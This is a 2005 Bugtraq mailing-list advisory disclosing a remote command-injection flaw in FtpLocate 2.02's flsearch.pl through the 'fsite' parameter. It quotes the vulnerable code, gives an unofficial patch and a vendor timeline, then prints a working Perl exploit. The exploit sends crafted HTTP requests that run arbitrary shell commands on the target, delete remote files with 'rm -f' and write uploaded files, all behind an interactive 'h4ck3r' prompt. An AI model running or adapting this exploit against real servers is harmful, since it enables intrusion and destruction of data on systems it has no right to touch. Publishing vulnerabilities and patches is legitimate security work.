[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Chroot Security Group Advisory 2005-07-25 -- ftplocate
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Chroot Security Group Advisory 2005-07-25 -- ftplocate
- From: newbug@xxxxxxxxxxxxxxxxx, "[at]"@securityfocus.com, chroot.org@xxxxxxxxxxxxxxxxx
- Date: 25 Jul 2005 02:31:59 -0000
Chroot Security Group Advisory 2005-07-25
Remote arbitrary code execution in FtpLocate 2.02 (current)
FtpLocate is a ftp search engine supporting filename and description search.
A remote attack can run arbitary commands with the web server's privileges by
exploiting a unfiltered parameter in flsearch.pl.
FtpLocate contains a vulnerability that can allow an attacker to execute
arbitrary commands. The vulnerability is due to improper input validation of
user-supplied parameters (fsite) by the flsearch.pl script. Remote attackers
can run arbitary commands with the web servers's privieges by adding a "|" or
Vuln. Systems:
FtpLocate 1.5 - 2.02
Vuln. Code:
/ftplocate-2.02/bin/flsearch.pl :
# line 23 - 60
$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
if ( $fsite eq "" ) {
} else {
open (L, "$CACHEDIR/$resultfname"); # Game Over 1
# line 53
do_flsearch($client, $query, $fsite, $resultfname);
# line 526 ? 537
if ( $fsite eq "" ) {
} else {
$optf="-F '$fsite'"; # for glimpse
# line 537
open(G, "$CMD_GLIMPSE -i -Ny $optf $optw -H $FILELISTDIR -e '$q'
2>/$TMPDIR/flsearch.tmp.$$|"); # Game Over 2
# line 584
`$CMD_AGREP -i -e '$q' $setlist_str
/dev/null>'$CACHEDIR/$resultfname'`; # Game Over 3
# line 589
`$CMD_AGREP -i -e '$q' $setlist_str
/dev/null>'$CACHEDIR/$resultfname'`; # Game Over 4
Unofficial Patch:
diff -urN flsearch.pl.orig flsearch.pl
--- flsearch.pl.orig 2005-07-22 17:48:52.502670968 +0800
+++ flsearch.pl 2005-07-22 17:56:00.979532584 +0800
@@ -20,7 +20,10 @@
$starttime=gettimeofday(); $starttimestr=timestr();
$query=clean_str($input{'query'}); $query_raw=CGI::escape($query);
-$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
+# dangerous characters
+$fsite =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
Vendor Response:
2005.07.15 Vendor notified via email.
2005.07.19 Vendor notified via email, again.
2005.07.25 No response. Advisory released.
Exploit Code:
# FtpLocate <= 2.02 (current) remote exploit
# newbug Tseng [at] chroot.org
sub my_socket
my $s=IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "socket: ";
sub ch2hex
$chr = $_[0];
$ch = substr($chr,$i,1);
if($ch eq "\"")
elsif($ch eq "\$")
elsif($ch eq "\@")
sub upload_file
print "local file: ";
chomp($lfile = <STDIN>);
print "remote file: ";
chomp($rfile = <STDIN>);
my $socket = &my_socket($host);
print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
close $socket;
print "remove $host:$rfile done.\n";
my @DATA = `cat $lfile`;
$total = scalar @DATA;
foreach $DATA (@DATA)
$DATA = &ch2hex($DATA);
my $socket = &my_socket($host);
print $socket "GET
$cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";
print "Send lfile \"$lfile\" to $host:$rfile ...
close $socket;
use IO::Socket::INET;
print "FtpLocate flsearch.pl remote exploit\n";
print "host: ";
chomp ($host = <STDIN>);
print "port (80): ";
chomp ($port = <STDIN>);
if($port eq "")
$port = 80;
print "version 1.0/1.1 (1.0): ";
chomp ($ver = <STDIN>);
if($ver eq "")
$ver = "1.0";
print "cmd/upload (cmd): ";
chomp ($opt = <STDIN>);
if($opt eq "")
$opt = "cmd";
print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";
chomp ($cgi = <STDIN>);
if($cgi eq "")
$cgi = "/cgi-bin/ftplocate/flsearch.pl";
if($ver eq "1.0")
$junk = "HTTP/1.0\n\n";
$junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux
i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1\nAccept:
zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset:
Big5,utf-8;q=0.7,*;q=0.7\nKeep-Alive: 300\nConnection: keep-alive\n\n";
if($opt eq "cmd")
print "h4ck3r\@[$host]:~\$ ";
chomp ($cmd = <STDIN>);
if($cmd ne "")
print "Send command \"$cmd\" to $host ...\n";
$socket = &my_socket($host);
$cmd =~ s/\s/%20/g;
print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
print "done.\n";
elsif($opt eq "upload")
print "done.\n";